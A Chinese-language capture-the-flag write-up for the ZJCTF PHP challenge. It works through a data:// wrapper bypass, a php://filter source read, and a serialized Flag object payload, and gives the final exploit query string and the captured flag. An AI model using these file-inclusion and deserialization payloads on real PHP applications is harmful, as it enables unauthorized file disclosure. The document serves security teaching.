- 打开网页
<?PHP
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
echo "Not Now!";
exit();
}else{
include($file); //useless.PHP
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
需要get方式提交参数,text、file、password
- 第一个需要绕过的地方
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))
要求text非空,且从text里读取字符串,还要和welcome to the zjctf相等
这时候就用到了data:// 写入协议
先构造第一个payload
?text=data://text/plain,welcome to the zjctf
下面我们不能用flag.PHP来访问,因为被正则匹配,我们就拿不到反序列化后的password了
if(preg_match("/flag/",$file)){
echo "Not Now!";
exit();
}
- 反序列化password
看到了useless.PHP文件包含,在这之前我们需要先读取里面的源码,然后将password反序列化出来
构造第二个payload
file=PHP://filter/read=convert.base64-encode/resource=useless.PHP
得到
PD9waHAgIAoKY2xhc3MgRmxhZ3sgiC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgiAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo
经过base64解码得到
<?PHP
class Flag{ //flag.PHP
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
得到源码之后,将这个源码中的$file赋值flag.PHP,反序列化一下
<?PHP
class Flag{ //flag.PHP
public $file="flag.PHP";
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
利用PHP解释器执行上面代码,得到反序列化的password
O:4:"Flag":1:{s:4:"file";s:8:"flag.PHP";}
4. 最终payload
text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.PHP&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.PHP%22;}
访问进入
- 查看源码得到flag
flag{17fb0a9c-1875-432f-aa25-3a75bc9ce6b7}
参考链接:
https://www.cnblogs.com/junlebao/p/13821921.html
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
